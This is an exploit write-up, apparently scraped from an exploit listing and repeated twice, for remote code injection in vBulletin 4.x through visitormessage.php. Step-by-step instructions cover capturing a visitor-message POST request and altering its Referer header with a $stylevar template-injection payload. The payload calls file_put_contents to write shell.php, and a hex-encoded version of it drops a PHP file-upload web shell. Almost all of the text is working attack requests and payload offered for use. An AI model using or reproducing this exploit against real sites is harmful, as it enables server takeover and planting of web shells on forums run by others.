Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability Discovered By: Dariush Nasirpour (Net.Edit0r...
Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
Discovered By: Dariush Nasirpour (Net.Edit0r)
Vendor Homepage: vBulletin.com
Tested on: [vBulletin 4.2.2]
Remote Code Injection:
1) You Must Register In The vBulletin http://www.victim.com/register.php example:[blackhat]
2) go to your user profile example: [http://black-hg.org/cc/members/blackhat.html]
3) post something in visitor message and record post data with live http header
[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time]
[Now post this with hackbar:]
URL: http://black-hg.org/cc/visitormessage.php?do=message
[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
[And referrer data:]
PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]"
5- Open hackbar and tamper it with taper data:
referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]" and submit request.
?a=$stylevar[${${file_put_contents("shell.php","\x3C\x68\x74\x6D\x6C\x3E\xD\xA\x20\x20\x20\x20\x3C\x62\x6F\x64\x79\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x66\x6F\x72\x6D\x20\x6D\x65\x74\x68\x6F\x64\x3D\x22\x70\x6F\x73\x74\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x22\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x22\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61\x22\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6C\x61\x62\x65\x6C\x20\x66\x6F\x72\x3D\x22\x66\x69\x6C\x65\x22\x3E\x46\x69\x6C\x65\x6E\x61\x6D\x65\x3A\x3C\x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x66\x69\x6C\x65\x22\x20\x6E\x61\x6D\x65\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\x69\x64\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x62\x72\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x73\x75\x62\x6D\x69\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x73\x75\x62\x6D\x69\x74\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x53\x75\x62\x6D\x69\x74\x22\x20\x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x66\x6F\x72\x6D\x3E\xD\xA\x20\x20\x20\x20\x3C\x2F\x62\x6F\x64\x79\x3E\xD\xA\x3C\x2F\x68\x74\x6D\x6C\x3E\xD\xA\x3C\x3F\x70\x68\x70\xD\xA\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x73\x75\x62\x6D\x69\x74\x27\x5D\x29\x29\x20\x7B\xD\xA\x20\x20\x20\x20\x69\x66\x20\x28\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x72\x22\x5D\x20\x3E\x20\x30\x29\x20\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\x20\x22\x45\x72\x72\x6F\x72\x3A\x20\x22\x20\x2E\x20\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x72\x22\x5D\x20\x2E\x20\x22\x3C\x62\x72\x20\x2F\x3E\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\x20\xD\xA\x20\x20\x20\x20\x65\x6C\x73\x65\x20\xD\xA\x20\x20\x20\x20\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x6F\x76\x65\x5F\x75\x70\x6C\x6F\x61\x64\x65\x64\x5F\x66\x69\x6C\x65\x28\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x74\x6D\x70\x5F\x6E\x61\x6D\x65\x22\x5D\x2C\x67\x65\x74\x63\x77\x64\x28\x29\x2E\x22\x5C\x5C\x22\x2E\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x6E\x61\x6D\x65\x22\x5D\x29\x3B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\x20\x22\x75\x70\x6C\x6F\x61\x64\x20\x69\x73\x20\x6F\x6B\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\xD\xA\x7D\xD\xA\x3F\x3E")}}]
Discovered By: Dariush Nasirpour (Net.Edit0r)
Vendor Homepage: vBulletin.com
Tested on: [vBulletin 4.2.2]
Remote Code Injection:
1) You Must Register In The vBulletin http://www.victim.com/register.php example:[blackhat]
2) go to your user profile example: [http://black-hg.org/cc/members/blackhat.html]
3) post something in visitor message and record post data with live http header
[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time]
[Now post this with hackbar:]
URL: http://black-hg.org/cc/visitormessage.php?do=message
[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
[And referrer data:]
PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]"
5- Open hackbar and tamper it with taper data:
referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]" and submit request.
?a=$stylevar[${${file_put_contents("shell.php","\x3C\x68\x74\x6D\x6C\x3E\xD\xA\x20\x20\x20\x20\x3C\x62\x6F\x64\x79\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x66\x6F\x72\x6D\x20\x6D\x65\x74\x68\x6F\x64\x3D\x22\x70\x6F\x73\x74\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x22\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x22\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61\x22\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6C\x61\x62\x65\x6C\x20\x66\x6F\x72\x3D\x22\x66\x69\x6C\x65\x22\x3E\x46\x69\x6C\x65\x6E\x61\x6D\x65\x3A\x3C\x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x66\x69\x6C\x65\x22\x20\x6E\x61\x6D\x65\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\x69\x64\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x62\x72\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x73\x75\x62\x6D\x69\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x73\x75\x62\x6D\x69\x74\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x53\x75\x62\x6D\x69\x74\x22\x20\x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x66\x6F\x72\x6D\x3E\xD\xA\x20\x20\x20\x20\x3C\x2F\x62\x6F\x64\x79\x3E\xD\xA\x3C\x2F\x68\x74\x6D\x6C\x3E\xD\xA\x3C\x3F\x70\x68\x70\xD\xA\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x73\x75\x62\x6D\x69\x74\x27\x5D\x29\x29\x20\x7B\xD\xA\x20\x20\x20\x20\x69\x66\x20\x28\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x72\x22\x5D\x20\x3E\x20\x30\x29\x20\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\x20\x22\x45\x72\x72\x6F\x72\x3A\x20\x22\x20\x2E\x20\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x72\x22\x5D\x20\x2E\x20\x22\x3C\x62\x72\x20\x2F\x3E\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\x20\xD\xA\x20\x20\x20\x20\x65\x6C\x73\x65\x20\xD\xA\x20\x20\x20\x20\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x6F\x76\x65\x5F\x75\x70\x6C\x6F\x61\x64\x65\x64\x5F\x66\x69\x6C\x65\x28\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x74\x6D\x70\x5F\x6E\x61\x6D\x65\x22\x5D\x2C\x67\x65\x74\x63\x77\x64\x28\x29\x2E\x22\x5C\x5C\x22\x2E\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x6E\x61\x6D\x65\x22\x5D\x29\x3B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\x20\x22\x75\x70\x6C\x6F\x61\x64\x20\x69\x73\x20\x6F\x6B\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\xD\xA\x7D\xD\xA\x3F\x3E")}}]
COMMENTS